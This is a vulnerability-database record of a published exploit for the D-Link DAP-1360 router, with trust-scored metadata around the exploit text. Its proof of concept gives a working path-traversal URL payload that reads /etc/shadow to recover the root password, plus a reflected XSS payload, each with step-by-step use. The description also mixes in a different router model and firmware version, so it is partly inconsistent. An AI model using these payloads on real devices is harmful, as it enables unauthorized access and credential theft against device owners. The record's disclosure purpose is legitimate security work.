ID
VAR-E-201807-0180
EDB ID
45084
TITLE
D-link DAP-1360 - Path Traversal / Cross-Site Scripting - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-link DAP-1360 - Path Traversal / Cross-Site Scripting. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | d link | model: | dap-1360 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Exploit Title: D-Link DAP-1360 File path traversal and Cross site scripting[reflected] can lead to Authentication Bypass easily.
# Date: 20-07-2018
# Exploit Author: r3m0t3nu11
# Contact : http://twitter.com/r3m0t3nu11
# Vendor : www.dlink.com
# Version: Hardware version: F1, Firmware version: 6.O5
# Tested on: All Platforms
1) Description
After successfully connecting to the D-Link DIR-600 Router (Firmware Version: 2.01), any user can bypass the router's root password as well as bypass the admin panel.
D-Link DAP-1360 devices with v6.x firmware allow remote attackers to read passwords via an errorpage parameter, which leads to an absolute path traversal attack.
It's more dangerous when your router has a public IP with remote login enabled.
IN MY CASE,
Tested Router IP : http://192.168.70.69/
Video POC : https://www.dropbox.com/s/tvpq2jm3jv48j3c/D-link.mov?dl=0
2) Proof of Concept
Step 1: Go to
Router Login Page : http://192.168.70.69:80
Step 2:
Add the payload to URL.
Payload:
getpage=html%2Findex.html&errorpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
Now you can get the root password by reading /etc/shadow.
2- XSS
Step 1: Go to
Router Login Page : http://192.168.70.69:80
Step 2:
Add the payload to URL.
Payload:
getpage=html%2Findex.html&errorpage=<Script>alert('r3m0t3nu11')</script>&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
You will get the r3m0t3nu11 name pop-up as reflected XSS.
Greetz to : Samir Hadji,0n3,C0ld Z3r0,alm3refh group,0x30 team,zero way team.
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Path Traversal / Cross-Site Scripting
Trust: 1.6
TAGS
tag: | Cross-Site Scripting (XSS) | Trust: 1.0 |
tag: | Traversal | Trust: 1.0 |
CREDITS
r3m0t3nu11
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 45084 | Trust: 1.6 |
db: | EDBNET | id: | 98736 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/45084/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 45084 |
db: | EDBNET | id: | 98736 |
LAST UPDATE DATE
2022-07-27T09:58:20.684000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 45084 | date: | 2018-07-24T00:00:00 |
db: | EDBNET | id: | 98736 | date: | 2018-07-28T00:00:00 |